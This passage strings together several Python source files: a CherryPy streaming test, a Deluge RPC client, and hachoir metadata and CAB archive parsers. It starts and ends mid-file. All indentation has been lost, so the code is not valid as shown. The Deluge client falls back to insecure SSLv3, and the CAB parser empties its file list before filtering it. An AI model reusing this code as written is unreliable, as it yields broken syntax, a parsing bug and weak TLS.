def setup_server():
class Root(object):
@cherrypy.expose
def count(self, clsname):
cherrypy.response.headers['Content-Type'] = 'text/plain'
return six.text_type(globals()[clsname].created)
@cherrypy.expose
def getall(self, clsname):
cherrypy.response.headers['Content-Type'] = 'text/plain'
return globals()[clsname]()
@cherrypy.expose
@cherrypy.config(**{'response.stream': True})
def stream(self, clsname):
return self.getall(clsname)
cherrypy.tree.mount(Root())
def test_iterator(self):
try:
self._test_iterator()
except Exception:
'Test fails intermittently. See #1419'
def _test_iterator(self):
if cherrypy.server.protocol_version != 'HTTP/1.1':
return self.skip()
self.PROTOCOL = 'HTTP/1.1'
# Check the counts of all the classes, they should be zero.
closables = ['OurClosableIterator', 'OurGenerator']
unclosables = ['OurUnclosableIterator', 'OurNotClosableIterator']
all_classes = closables + unclosables
import random
random.shuffle(all_classes)
for clsname in all_classes:
self.getPage('/count/' + clsname)
self.assertStatus(200)
self.assertBody('0')
# We should also be able to read the entire content body
# successfully, though we don't need to, we just want to
# check the header.
for clsname in all_classes:
itr_conn = self.get_conn()
itr_conn.putrequest('GET', '/getall/' + clsname)
itr_conn.endheaders()
response = itr_conn.getresponse()
self.assertEqual(response.status, 200)
headers = response.getheaders()
for header_name, header_value in headers:
if header_name.lower() == 'content-length':
assert header_value == six.text_type(1024 * 16 * 256), header_value
break
else:
raise AssertionError('No Content-Length header found')
# As the response should be fully consumed by CherryPy
# before sending back, the count should still be at zero
# by the time the response has been sent.
self.getPage('/count/' + clsname)
self.assertStatus(200)
self.assertBody('0')
# Now we do the same check with streaming - some classes will
# be automatically closed, while others cannot.
stream_counts = {}
for clsname in all_classes:
itr_conn = self.get_conn()
itr_conn.putrequest('GET', '/stream/' + clsname)
itr_conn.endheaders()
response = itr_conn.getresponse()
self.assertEqual(response.status, 200)
response.fp.read(65536)
# Let's check the count - this should always be one.
self.getPage('/count/' + clsname)
self.assertBody('1')
# Now if we close the connection, the count should go back
# to zero.
itr_conn.close()
self.getPage('/count/' + clsname)
# If this is a response which should be easily closed, then
# we will test to see if the value has gone back down to
# zero.
if clsname in closables:
# Sometimes we try to get the answer too quickly - we
# will wait for 100 ms before asking again if we didn't
# get the answer we wanted.
if self.body != '0':
import time
time.sleep(0.1)
self.getPage('/count/' + clsname)
stream_counts[clsname] = int(self.body)
# Check that we closed off the classes which should provide
# easy mechanisms for doing so.
for clsname in closables:
assert stream_counts[clsname] == 0, (
'did not close off stream response correctly, expected '
'count of zero for %s: %s' % (clsname, stream_counts)
)
```
#### File: lib/deluge_client/client.py
```python
import logging
import socket
import ssl
import struct
import zlib
from .rencode import dumps, loads
RPC_RESPONSE = 1
RPC_ERROR = 2
RPC_EVENT = 3
#MESSAGE_HEADER_SIZE = 5
READ_SIZE = 10
logger = logging.getLogger(__name__)
class ConnectionLostException(Exception):
pass
class CallTimeoutException(Exception):
pass
class DelugeRPCClient(object):
timeout = 20
def __init__(self, host, port, username, password):
self.host = host
self.port = port
self.username = username
self.password = password
self.request_id = 1
self.connected = False
self._create_socket()
def _create_socket(self, ssl_version=None):
if ssl_version is not None:
self._socket = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM), ssl_version=ssl_version)
else:
self._socket = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
self._socket.settimeout(self.timeout)
def connect(self):
"""
Connects to the Deluge instance
"""
logger.info('Connecting to %s:%s' % (self.host, self.port))
try:
self._socket.connect((self.host, self.port))
except ssl.SSLError as e:
if e.reason != 'UNSUPPORTED_PROTOCOL' or not hasattr(ssl, 'PROTOCOL_SSLv3'):
raise
logger.warning('Was unable to ssl handshake, trying to force SSLv3 (insecure)')
self._create_socket(ssl_version=ssl.PROTOCOL_SSLv3)
self._socket.connect((self.host, self.port))
logger.debug('Connected to Deluge, logging in')
result = self.call('daemon.login', self.username, self.password)
if type(result) == str:
return result
logger.debug('Logged in with value %r' % result)
self.connected = True
def disconnect(self):
"""
Disconnect from deluge
"""
if self.connected:
self._socket.close()
def call(self, method, *args, **kwargs):
"""
Calls an RPC function
"""
self.request_id += 1
logger.debug('Calling reqid %s method %r with args:%r kwargs:%r' % (self.request_id, method, args, kwargs))
req = ((self.request_id, method, args, kwargs), )
req = zlib.compress(dumps(req))
#self._socket.send('D' + struct.pack("!i", len(req))) # seems to be for the future !
self._socket.send(req)
data = b''
while True:
try:
d = self._socket.recv(READ_SIZE)
except ssl.SSLError:
raise CallTimeoutException()
data += d
try:
data = zlib.decompress(data)
except zlib.error:
if not d:
raise ConnectionLostException()
continue
break
data = list(loads(data))
msg_type = data.pop(0)
request_id = data.pop(0)
if msg_type == RPC_ERROR:
exception_type, exception_msg, traceback = data[0]
exception = type(str(exception_type), (Exception, ), {})
# exception_msg = '%s\n\n%s' % (exception_msg, traceback)
# raise exception(exception_msg)
return exception_msg
elif msg_type == RPC_RESPONSE:
retval = data[0]
return retval
```
#### File: hachoir/core/error.py
```python
from hachoir.core.log import log
import sys
import traceback
def getBacktrace(empty="Empty backtrace."):
"""
Try to get backtrace as string.
Returns "Error while trying to get backtrace" on failure.
"""
try:
info = sys.exc_info()
trace = traceback.format_exception(*info)
if trace[0] != "None\n":
return "".join(trace)
except:
# No i18n here (imagine if i18n function calls error...)
return "Error while trying to get backtrace"
return empty
info = log.info
warning = log.warning
error = log.error
```
#### File: hachoir/field/bit_field.py
```python
from hachoir.field import Field
from hachoir.core import config
class RawBits(Field):
"""
Unknown content with a size in bits.
"""
static_size = staticmethod(lambda *args, **kw: args[1])
def __init__(self, parent, name, size, description=None):
"""
Constructor: see L{Field.__init__} for parameter description
"""
Field.__init__(self, parent, name, size, description)
def hasValue(self):
return True
def createValue(self):
return self._parent.stream.readBits(
self.absolute_address, self._size, self._parent.endian)
def createDisplay(self):
if self._size < config.max_bit_length:
return str(self.value)
else:
return ("<%s size=%u>" %
(self.__class__.__name__, self._size))
createRawDisplay = createDisplay
class Bits(RawBits):
"""
Positive integer with a size in bits
@see: L{Bit}
@see: L{RawBits}
"""
pass
class Bit(RawBits):
"""
Single bit: value can be False or True, and size is exactly one bit.
@see: L{Bits}
"""
static_size = 1
def __init__(self, parent, name, description=None):
"""
Constructor: see L{Field.__init__} for parameter description
"""
RawBits.__init__(self, parent, name, 1, description=description)
def createValue(self):
return 1 == self._parent.stream.readBits(
self.absolute_address, 1, self._parent.endian)
def createRawDisplay(self):
return str(int(self.value))
```
#### File: hachoir/field/sub_file.py
```python
from hachoir.field import Bytes
from hachoir.core.tools import makePrintable, humanFilesize
from hachoir.stream import InputIOStream
class SubFile(Bytes):
"""
File stored in another file
"""
def __init__(self, parent, name, length, description=None,
parser=None, filename=None, mime_type=None, parser_class=None):
if filename:
if not isinstance(filename, str):
filename = makePrintable(filename, "ISO-8859-1")
if not description:
description = 'File "%s" (%s)' % (
filename, humanFilesize(length))
Bytes.__init__(self, parent, name, length, description)
def createInputStream(cis, **args):
tags = args.setdefault("tags", [])
if parser_class:
tags.append(("class", parser_class))
if parser is not None:
tags.append(("id", parser.PARSER_TAGS["id"]))
if mime_type:
tags.append(("mime", mime_type))
if filename:
tags.append(("filename", filename))
return cis(**args)
self.setSubIStream(createInputStream)
class CompressedStream:
offset = 0
def __init__(self, stream, decompressor):
self.stream = stream
self.decompressor = decompressor(stream)
self._buffer = b''
def read(self, size):
d = self._buffer
data = [d[:size]]
size -= len(d)
if size > 0:
d = self.decompressor(size)
data.append(d[:size])
size -= len(d)
while size > 0:
n = 4096
if self.stream.size:
n = min(self.stream.size - self.offset, n)
if not n:
break
d = self.stream.read(self.offset, n)[1]
self.offset += 8 * len(d)
d = self.decompressor(size, d)
data.append(d[:size])
size -= len(d)
self._buffer = d[size + len(d):]
return b''.join(data)
def CompressedField(field, decompressor):
def createInputStream(cis, source=None, **args):
if field._parent:
stream = cis(source=source)
args.setdefault("tags", []).extend(stream.tags)
else:
stream = field.stream
input = CompressedStream(stream, decompressor)
if source is None:
source = "Compressed source: '%s' (offset=%s)" % (
stream.source, field.absolute_address)
return InputIOStream(input, source=source, **args)
field.setSubIStream(createInputStream)
return field
```
#### File: hachoir/metadata/cr2.py
```python
from hachoir.metadata.metadata import (registerExtractor, RootMetadata)
from hachoir.parser.image import CR2File
from hachoir.metadata.safe import fault_tolerant
class CR2Metadata(RootMetadata):
key_to_attr = {
"ImageWidth": "width",
"ImageLength": "height",
"ImageDescription": "comment",
"DocumentName": "title",
"XResolution": "width_dpi",
"YResolution": "height_dpi",
}
def extract(self, tiff):
if "ifd[0]" in tiff:
self.useIFD(tiff["ifd[0]"])
self.camera_manufacturer = tiff["ifd[0]"]["value[4]"].value
self.camera_model = tiff["ifd[0]"]["value[5]"].value
if "exif[0]" in tiff:
self.date_time_original = tiff["exif[0]"]["value[7]"].value
self.date_time_digitized = tiff["exif[0]"]["value[8]"].value
def useIFD(self, ifd):
attr = {}
for entry in ifd.array("entry"):
self.processIfdEntry(ifd, entry, attr)
if 'BitsPerSample' in attr and 'SamplesPerPixel' in attr:
self.bits_per_pixel = attr[
'BitsPerSample'] * attr['SamplesPerPixel']
@fault_tolerant
def processIfdEntry(self, ifd, entry, attr):
tag = entry["tag"].display
if tag in {"BitsPerSample", "SamplesPerPixel"}:
value = ifd.getEntryValues(entry)[0].value
attr[tag] = value
return
try:
attrname = self.key_to_attr[tag]
except KeyError:
return
value = ifd.getEntryValues(entry)[0].value
if tag in {"XResolution", "YResolution"}:
value = round(value)
setattr(self, attrname, value)
registerExtractor(CR2File, CR2Metadata)
```
#### File: hachoir/metadata/formatter.py
```python
NB_CHANNEL_NAME = {1: "mono", 2: "stereo"}
def humanAudioChannel(value):
return NB_CHANNEL_NAME.get(value, str(value))
def humanFrameRate(value):
if isinstance(value, (int, float)):
return "%.1f fps" % value
else:
return value
def humanComprRate(rate):
return "%.1fx" % rate
def humanAltitude(value):
return "%.1f meters" % value
def humanPixelSize(value):
return "%s pixels" % value
def humanDPI(value):
return "%s DPI" % value
```
#### File: hachoir/metadata/gtk.py
```python
import sys
import os
from gi.repository import Gtk
from hachoir.parser import createParser
from hachoir.metadata import extractMetadata
class MetadataGtk:
def __init__(self):
self.main_window = Gtk.Window()
self.main_window.set_border_width(5)
self.main_window.connect("destroy", self._destroy)
self.main_vbox = Gtk.VBox()
self.select_hbox = Gtk.HBox()
self.select_button = Gtk.Button("Select")
self.select_button.connect("clicked", self._select_clicked)
self.select_hbox.pack_start(self.select_button, False, True, 0)
self.file_combo = Gtk.ComboBoxText()
self.file_combo.connect("changed", self._file_combo_changed)
self.select_hbox.pack_start(self.file_combo, True, True, 0)
self.main_vbox.pack_start(self.select_hbox, False, True, 0)
self.metadata_table = Gtk.Table(1, 1)
self.metadata_table.attach(
Gtk.Label("Select a file to view metadata information..."), 0, 1, 0, 1)
self.main_vbox.pack_start(self.metadata_table, True, True, 0)
self.main_window.add(self.main_vbox)
self.main_window.show_all()
def add_file(self, filename):
self.file_combo.append_text(filename)
def _select_clicked(self, widget):
file_chooser = Gtk.FileChooserDialog("Ouvrir..", None,
Gtk.FILE_CHOOSER_ACTION_OPEN,
(Gtk.STOCK_CANCEL, Gtk.RESPONSE_CANCEL,
Gtk.STOCK_OPEN, Gtk.RESPONSE_OK))
file_chooser.set_default_response(Gtk.RESPONSE_OK)
file_chooser.show()
reponse = file_chooser.run()
if reponse == Gtk.RESPONSE_OK:
selected_file = file_chooser.get_filename()
self.add_file(selected_file)
file_chooser.destroy()
def _file_combo_changed(self, widget):
self.main_vbox.remove(self.metadata_table)
filename = self.file_combo.get_active_text()
parser = createParser(filename)
metadata = extractMetadata(parser)
self.metadata_table = Gtk.Table(1, 2)
self.main_vbox.pack_start(self.metadata_table, True, True, 0)
if metadata is None:
self.metadata_table.attach(
Gtk.Label("Unknown file format"), 0, 1, 0, 1)
else:
total = 1
for data in sorted(metadata):
if not data.values:
continue
title = data.description
for item in data.values:
self.metadata_table.resize(total, 2)
value = item.text
self.metadata_table.attach(
Gtk.Label(title + ":"), 0, 1, total - 1, total)
self.metadata_table.attach(
Gtk.Label(value), 1, 2, total - 1, total)
total += 1
self.metadata_table.show_all()
def _destroy(self, widget, data=None):
Gtk.main_quit()
def main(self):
has_file = False
for arg in sys.argv[1:]:
if os.path.isdir(arg):
for file in os.listdir(arg):
path = os.path.join(arg, file)
if os.path.isfile(path):
self.add_file(path)
has_file = True
elif os.path.isfile(arg):
self.add_file(arg)
has_file = True
if has_file:
self.file_combo.set_active(0)
Gtk.main()
```
#### File: hachoir/metadata/image.py
```python
from hachoir.metadata.metadata import (registerExtractor, Metadata,
RootMetadata, MultipleMetadata)
from hachoir.parser.image import (
BmpFile, IcoFile, PcxFile, GifFile, PngFile, TiffFile,
XcfFile, TargaFile, WMF_File, PsdFile)
from hachoir.parser.image.png import getBitsPerPixel as pngBitsPerPixel
from hachoir.parser.image.xcf import XcfProperty
from hachoir.metadata.safe import fault_tolerant
def computeComprRate(meta, compr_size):
"""
Compute image compression rate. Skip size of color palette, focus on
image pixels. Original size is width x height x bpp. Compressed size
is an argument (in bits).
Set "compr_data" with a string like "1.52x".
"""
if (not meta.has("width")
or not meta.has("height")
or not meta.has("bits_per_pixel")):
return
if not compr_size:
return
orig_size = meta.get('width') * meta.get('height') * \
meta.get('bits_per_pixel')
meta.compr_rate = float(orig_size) / compr_size
class BmpMetadata(RootMetadata):
def extract(self, image):
if "header" not in image:
return
hdr = image["header"]
self.width = hdr["width"].value
self.height = hdr["height"].value
bpp = hdr["bpp"].value
if bpp:
if bpp <= 8 and "used_colors" in hdr:
self.nb_colors = hdr["used_colors"].value
self.bits_per_pixel = bpp
self.compression = hdr["compression"].display
self.format_version = ("Microsoft Bitmap version %s"
% hdr.getFormatVersion())
self.width_dpi = hdr["horizontal_dpi"].value
self.height_dpi = hdr["vertical_dpi"].value
if "pixels" in image:
computeComprRate(self, image["pixels"].size)
class TiffMetadata(RootMetadata):
key_to_attr = {
"ImageWidth": "width",
"ImageLength": "height",
"Software": "producer",
"ImageDescription": "comment",
"DocumentName": "title",
"XResolution": "width_dpi",
"YResolution": "height_dpi",
"DateTime": "creation_date",
}
def extract(self, tiff):
if "ifd[0]" in tiff:
self.useIFD(tiff["ifd[0]"])
def useIFD(self, ifd):
attr = {}
for entry in ifd.array("entry"):
self.processIfdEntry(ifd, entry, attr)
if 'BitsPerSample' in attr and 'SamplesPerPixel' in attr:
self.bits_per_pixel = attr[
'BitsPerSample'] * attr['SamplesPerPixel']
@fault_tolerant
def processIfdEntry(self, ifd, entry, attr):
tag = entry["tag"].display
if tag in {"BitsPerSample", "SamplesPerPixel"}:
value = ifd.getEntryValues(entry)[0].value
attr[tag] = value
return
try:
attrname = self.key_to_attr[tag]
except KeyError:
return
value = ifd.getEntryValues(entry)[0].value
if tag in {"XResolution", "YResolution"}:
value = round(value)
setattr(self, attrname, value)
class IcoMetadata(MultipleMetadata):
color_to_bpp = {
2: 1,
16: 4,
256: 8
}
def extract(self, icon):
for index, header in enumerate(icon.array("icon_header")):
image = Metadata(self)
# Read size and colors from header
image.width = header["width"].value
image.height = header["height"].value
bpp = header["bpp"].value
nb_colors = header["nb_color"].value
if nb_colors != 0:
image.nb_colors = nb_colors
if bpp == 0 and nb_colors in self.color_to_bpp:
bpp = self.color_to_bpp[nb_colors]
elif bpp == 0:
bpp = 8
image.bits_per_pixel = bpp
image.setHeader("Icon #%u (%sx%s)"
% (1 + index,
image.get("width", "?"),
image.get("height", "?")))
# Read compression from data (if available)
key = "icon_data[%u]/header/codec" % index
if key in icon:
image.compression = icon[key].display
key = "icon_data[%u]/pixels" % index
if key in icon:
computeComprRate(image, icon[key].size)
# Store new image
self.addGroup("image[%u]" % index, image)
class PcxMetadata(RootMetadata):
@fault_tolerant
def extract(self, pcx):
self.width = 1 + pcx["xmax"].value
self.height = 1 + pcx["ymax"].value
self.width_dpi = pcx["horiz_dpi"].value
self.height_dpi = pcx["vert_dpi"].value
self.bits_per_pixel = pcx["bpp"].value
if 1 <= pcx["bpp"].value <= 8:
self.nb_colors = 2 ** pcx["bpp"].value
self.compression = "Run-length encoding (RLE)"
self.format_version = "PCX: %s" % pcx["version"].display
if "image_data" in pcx:
computeComprRate(self, pcx["image_data"].size)
class XcfMetadata(RootMetadata):
# Map image type to bits/pixel
TYPE_TO_BPP = {0: 24, 1: 8, 2: 8}
def extract(self, xcf):
self.width = xcf["width"].value
self.height = xcf["height"].value
try:
self.bits_per_pixel = self.TYPE_TO_BPP[xcf["type"].value]
except KeyError:
pass
self.format_version = xcf["type"].display
self.readProperties(xcf)
@fault_tolerant
def processProperty(self, prop):
type = prop["type"].value
if type == XcfProperty.PROP_PARASITES:
for field in prop["data"]:
if "name" not in field or "data" not in field:
continue
if field["name"].value == "gimp-comment":
self.comment = field["data"].value
elif type == XcfProperty.PROP_COMPRESSION:
self.compression = prop["data/compression"].display
elif type == XcfProperty.PROP_RESOLUTION:
self.width_dpi = int(prop["data/xres"].value)
self.height_dpi = int(prop["data/yres"].value)
def readProperties(self, xcf):
for prop in xcf.array("property"):
self.processProperty(prop)
class PngMetadata(RootMetadata):
TEXT_TO_ATTR = {
"software": "producer",
}
def extract(self, png):
if "header" in png:
self.useHeader(png["header"])
if "time" in png:
self.useTime(png["time"])
if "physical" in png:
self.usePhysical(png["physical"])
for comment in png.array("text"):
if "text" not in comment:
continue
keyword = comment["keyword"].value
text = comment["text"].value
try:
key = self.TEXT_TO_ATTR[keyword.lower()]
setattr(self, key, text)
except KeyError:
if keyword.lower() != "comment":
self.comment = "%s=%s" % (keyword, text)
else:
self.comment = text
compr_size = sum(data.size for data in png.array("data"))
computeComprRate(self, compr_size)
@fault_tolerant
def useTime(self, field):
self.creation_date = field.value
@fault_tolerant
def usePhysical(self, field):
self.width_dpi = field["pixel_per_unit_x"].value
self.height_dpi = field["pixel_per_unit_y"].value
@fault_tolerant
def useHeader(self, header):
self.width = header["width"].value
self.height = header["height"].value
# Read number of colors and pixel format
if "/palette/size" in header:
nb_colors = header["/palette/size"].value // 3
else:
nb_colors = None
if not header["has_palette"].value:
if header["has_alpha"].value:
self.pixel_format = "RGBA"
else:
self.pixel_format = "RGB"
elif "/transparency" in header:
self.pixel_format = "Color index with transparency"
if nb_colors:
nb_colors -= 1
else:
self.pixel_format = "Color index"
self.bits_per_pixel = pngBitsPerPixel(header)
if nb_colors:
self.nb_colors = nb_colors
# Read compression, timestamp, etc.
self.compression = header["compression"].display
class GifMetadata(RootMetadata):
def extract(self, gif):
self.useScreen(gif["/screen"])
if self.has("bits_per_pixel"):
self.nb_colors = (1 << self.get('bits_per_pixel'))
self.compression = "LZW"
self.format_version = "GIF version %s" % gif["version"].value
for comments in gif.array("comments"):
for comment in gif.array(comments.name + "/comment"):
self.comment = comment.value
if ("graphic_ctl/has_transp" in gif
and gif["graphic_ctl/has_transp"].value):
self.pixel_format = "Color index with transparency"
else:
self.pixel_format = "Color index"
@fault_tolerant
def useScreen(self, screen):
self.width = screen["width"].value
self.height = screen["height"].value
self.bits_per_pixel = (1 + screen["size_global_map"].value)
class TargaMetadata(RootMetadata):
def extract(self, tga):
self.width = tga["width"].value
self.height = tga["height"].value
self.bits_per_pixel = tga["bpp"].value
if tga["nb_color"].value:
self.nb_colors = tga["nb_color"].value
self.compression = tga["codec"].display
if "pixels" in tga:
computeComprRate(self, tga["pixels"].size)
class WmfMetadata(RootMetadata):
def extract(self, wmf):
if wmf.isAPM():
if "amf_header/rect" in wmf:
rect = wmf["amf_header/rect"]
self.width = (rect["right"].value - rect["left"].value)
self.height = (rect["bottom"].value - rect["top"].value)
self.bits_per_pixel = 24
elif wmf.isEMF():
emf = wmf["emf_header"]
if "description" in emf:
desc = emf["description"].value
if "\0" in desc:
self.producer, self.title = desc.split("\0", 1)
else:
self.producer = desc
if emf["nb_colors"].value:
self.nb_colors = emf["nb_colors"].value
self.bits_per_pixel = 8
else:
self.bits_per_pixel = 24
self.width = emf["width_px"].value
self.height = emf["height_px"].value
class PsdMetadata(RootMetadata):
@fault_tolerant
def extract(self, psd):
self.width = psd["width"].value
self.height = psd["height"].value
self.bits_per_pixel = psd["depth"].value * psd["nb_channels"].value
self.pixel_format = psd["color_mode"].display
self.compression = psd["compression"].display
registerExtractor(IcoFile, IcoMetadata)
registerExtractor(GifFile, GifMetadata)
registerExtractor(XcfFile, XcfMetadata)
registerExtractor(TargaFile, TargaMetadata)
registerExtractor(PcxFile, PcxMetadata)
registerExtractor(BmpFile, BmpMetadata)
registerExtractor(PngFile, PngMetadata)
registerExtractor(TiffFile, TiffMetadata)
registerExtractor(WMF_File, WmfMetadata)
registerExtractor(PsdFile, PsdMetadata)
```
#### File: parser/archive/cab.py
```python
from hachoir.parser import Parser
from hachoir.field import (FieldSet, Enum,
CString, String,
UInt8, UInt16, UInt32, Bit, Bits, PaddingBits, NullBits,
DateTimeMSDOS32, RawBytes)
from hachoir.core.text_handler import textHandler, hexadecimal, filesizeHandler
from hachoir.core.endian import LITTLE_ENDIAN
from hachoir.core.tools import paddingSize
from hachoir.stream import StringInputStream
from hachoir.parser.archive.lzx import LZXStream, lzx_decompress
from hachoir.parser.archive.zlib import DeflateBlock
MAX_NB_FOLDER = 30
COMPRESSION_NONE = 0
COMPRESSION_NAME = {
0: "Uncompressed",
1: "Deflate",
2: "Quantum",
3: "LZX",
}
class Folder(FieldSet):
def createFields(self):
yield UInt32(self, "offset", "Offset to data (from file start)")
yield UInt16(self, "data_blocks", "Number of data blocks which are in this cabinet")
yield Enum(Bits(self, "compr_method", 4, "Compression method"), COMPRESSION_NAME)
if self["compr_method"].value in [2, 3]: # Quantum or LZX use compression level
yield PaddingBits(self, "padding[]", 4)
yield Bits(self, "compr_level", 5, "Compression level")
yield PaddingBits(self, "padding[]", 3)
else:
yield PaddingBits(self, "padding[]", 12)
if self["../flags/has_reserved"].value and self["../reserved_folder_size"].value:
yield RawBytes(self, "reserved_folder", self["../reserved_folder_size"].value, "Per-folder reserved area")
def createDescription(self):
text = "Folder: compression %s" % self["compr_method"].display
if self["compr_method"].value in [2, 3]: # Quantum or LZX use compression level
text += " (level %u: window size %u)" % (
self["compr_level"].value, 2**self["compr_level"].value)
return text
class CabFileAttributes(FieldSet):
def createFields(self):
yield Bit(self, "readonly")
yield Bit(self, "hidden")
yield Bit(self, "system")
yield Bits(self, "reserved[]", 2)
yield Bit(self, "archive", "Has the file been modified since the last backup?")
yield Bit(self, "exec", "Run file after extraction?")
yield Bit(self, "name_is_utf", "Is the filename using UTF-8?")
yield Bits(self, "reserved[]", 8)
class File(FieldSet):
def createFields(self):
yield filesizeHandler(UInt32(self, "filesize", "Uncompressed file size"))
yield UInt32(self, "folder_offset", "File offset in uncompressed folder")
yield Enum(UInt16(self, "folder_index", "Containing folder ID (index)"), {
0xFFFD: "Folder continued from previous cabinet (real folder ID = 0)",
0xFFFE: "Folder continued to next cabinet (real folder ID = %i)" % (self["../nb_folder"].value - 1),
0xFFFF: "Folder spanning previous, current and next cabinets (real folder ID = 0)"})
yield DateTimeMSDOS32(self, "timestamp")
yield CabFileAttributes(self, "attributes")
if self["attributes/name_is_utf"].value:
yield CString(self, "filename", charset="UTF-8")
else:
yield CString(self, "filename", charset="ASCII")
def createDescription(self):
return "File %s (%s)" % (
self["filename"].display, self["filesize"].display)
class Flags(FieldSet):
static_size = 16
def createFields(self):
yield Bit(self, "has_previous")
yield Bit(self, "has_next")
yield Bit(self, "has_reserved")
yield NullBits(self, "padding", 13)
class FragmentGroup:
def __init__(self, parser):
self.items = []
self.parser = parser
self.args = {}
def add(self, item):
self.items.append(item)
def createInputStream(self):
# FIXME: Use lazy stream creation
data = []
for item in self.items:
data.append(item["rawdata"].value)
data = b"".join(data)
# FIXME: Use smarter code to send arguments
self.args["compr_level"] = self.items[
0].parent.parent.folder["compr_level"].value
tags = {"class": self.parser, "args": self.args}
tags = iter(tags.items())
return StringInputStream(data, "<fragment group>", tags=tags)
class CustomFragment(FieldSet):
def __init__(self, parent, name, size, parser, description=None, group=None):
FieldSet.__init__(self, parent, name, description, size=size)
if not group:
group = FragmentGroup(parser)
self.field_size = size
self.group = group
self.group.add(self)
def createFields(self):
yield RawBytes(self, "rawdata", self.field_size // 8)
def _createInputStream(self, **args):
return self.group.createInputStream()
class DataBlock(FieldSet):
def __init__(self, *args, **kwargs):
FieldSet.__init__(self, *args, **kwargs)
size = (self["size"].value + 8) * 8 # +8 for header values
if self["/flags/has_reserved"].value:
size += self["/reserved_data_size"].value * 8
self._size = size
def createFields(self):
yield textHandler(UInt32(self, "crc32"), hexadecimal)
yield UInt16(self, "size")
yield UInt16(self, "uncompressed_size", "If this is 0, this block is continued in a subsequent cabinet")
if self["/flags/has_reserved"].value and self["/reserved_data_size"].value:
yield RawBytes(self, "reserved_data", self["/reserved_data_size"].value, "Per-datablock reserved area")
compr_method = self.parent.folder["compr_method"].value
if compr_method == 0: # Uncompressed
yield RawBytes(self, "data", self["size"].value, "Folder Data")
self.parent.uncompressed_data += self["data"].value
elif compr_method == 1: # MSZIP
yield String(self, "mszip_signature", 2, "MSZIP Signature (CK)")
yield DeflateBlock(self, "deflate_block", self.parent.uncompressed_data)
padding = paddingSize(self.current_size, 8)
if padding:
yield PaddingBits(self, "padding[]", padding)
self.parent.uncompressed_data = self["deflate_block"].uncomp_data
elif compr_method == 2: # Quantum
yield RawBytes(self, "compr_data", self["size"].value, "Compressed Folder Data")
elif compr_method == 3: # LZX
group = getattr(self.parent.folder, "lzx_group", None)
field = CustomFragment(
self, "data", self["size"].value * 8, LZXStream, "LZX data fragment", group)
self.parent.folder.lzx_group = field.group
yield field
class FolderParser(Parser):
endian = LITTLE_ENDIAN
def createFields(self):
for file in sorted(self.files, key=lambda x: x["folder_offset"].value):
padding = self.seekByte(file["folder_offset"].value)
if padding:
yield padding
yield RawBytes(self, "file[]", file["filesize"].value, file.description)
class FolderData(FieldSet):
def __init__(self, parent, name, folder, files, *args, **kwargs):
FieldSet.__init__(self, parent, name, *args, **kwargs)
def createInputStream(cis, source=None, **args):
stream = cis(source=source)
tags = args.setdefault("tags", [])
tags.extend(stream.tags)
tags.append(("class", FolderParser))
tags.append(("args", {'files': files}))
for unused in self:
pass
if folder["compr_method"].value == 3: # LZX
self.uncompressed_data = lzx_decompress(
self["block[0]/data"].getSubIStream(), folder["compr_level"].value)
return StringInputStream(self.uncompressed_data, source=source, **args)
self.setSubIStream(createInputStream)
self.files = files
self.folder = folder # Folder fieldset
def createFields(self):
self.uncompressed_data = ""
for index in range(self.folder["data_blocks"].value):
block = DataBlock(self, "block[]")
for i in block:
pass
yield block
class CabFile(Parser):
endian = LITTLE_ENDIAN
MAGIC = b"MSCF"
PARSER_TAGS = {
"id": "cab",
"category": "archive",
"file_ext": ("cab",),
"mime": ("application/vnd.ms-cab-compressed",),
"magic": ((MAGIC, 0),),
"min_size": 1 * 8, # header + file entry
"description": "Microsoft Cabinet archive"
}
def validate(self):
if self.stream.readBytes(0, 4) != self.MAGIC:
return "Invalid magic"
if self["major_version"].value != 1 or self["minor_version"].value != 3:
return "Unknown version (%i.%i)" % (self["major_version"].value, self["minor_version"].value)
if not (1 <= self["nb_folder"].value <= MAX_NB_FOLDER):
return "Invalid number of folder (%s)" % self["nb_folder"].value
return True
def createFields(self):
yield String(self, "magic", 4, "Magic (MSCF)", charset="ASCII")
yield textHandler(UInt32(self, "hdr_checksum", "Header checksum (0 if not used)"), hexadecimal)
yield filesizeHandler(UInt32(self, "filesize", "Cabinet file size"))
yield textHandler(UInt32(self, "fld_checksum", "Folders checksum (0 if not used)"), hexadecimal)
yield UInt32(self, "off_file", "Offset of first file")
yield textHandler(UInt32(self, "files_checksum", "Files checksum (0 if not used)"), hexadecimal)
yield UInt8(self, "minor_version", "Minor version (should be 3)")
yield UInt8(self, "major_version", "Major version (should be 1)")
yield UInt16(self, "nb_folder", "Number of folders")
yield UInt16(self, "nb_files", "Number of files")
yield Flags(self, "flags")
yield UInt16(self, "setid")
yield UInt16(self, "cabinet_serial", "Zero-based cabinet number")
if self["flags/has_reserved"].value:
yield UInt16(self, "reserved_header_size", "Size of per-cabinet reserved area")
yield UInt8(self, "reserved_folder_size", "Size of per-folder reserved area")
yield UInt8(self, "reserved_data_size", "Size of per-datablock reserved area")
if self["reserved_header_size"].value:
yield RawBytes(self, "reserved_header", self["reserved_header_size"].value, "Per-cabinet reserved area")
if self["flags/has_previous"].value:
yield CString(self, "previous_cabinet", "File name of previous cabinet", charset="ASCII")
yield CString(self, "previous_disk", "Description of disk/media on which previous cabinet resides", charset="ASCII")
if self["flags/has_next"].value:
yield CString(self, "next_cabinet", "File name of next cabinet", charset="ASCII")
yield CString(self, "next_disk", "Description of disk/media on which next cabinet resides", charset="ASCII")
folders = []
files = []
for index in range(self["nb_folder"].value):
folder = Folder(self, "folder[]")
yield folder
folders.append(folder)
for index in range(self["nb_files"].value):
file = File(self, "file[]")
yield file
files.append(file)
folders = sorted(enumerate(folders),
key=lambda x: x[1]["offset"].value)
for i in range(len(folders)):
index, folder = folders[i]
padding = self.seekByte(folder["offset"].value)
if padding:
yield padding
files = []
for file in files:
if file["folder_index"].value == index:
files.append(file)
if i + 1 == len(folders):
size = (self.size // 8) - folder["offset"].value
else:
size = (folders[i + 1][1]["offset"].value) - \
folder["offset"].value
yield FolderData(self, "folder_data[%i]" % index, folder, files, size=size * 8)
end = self.seekBit(self.size, "endraw")
if end:
yield end
def createContentSize(self):
return self["filesize"].value * 8
```
#### File: parser/archive/gzip_parser.py
```python
from hachoir.parser import Parser
from hachoir.field import (
UInt8, UInt16, UInt32, Enum, TimestampUnix32,
Bit, CString, SubFile,
NullBits, Bytes, RawBytes)
from hachoir.core.text_handler import textHandler, hexadecimal, filesizeHandler
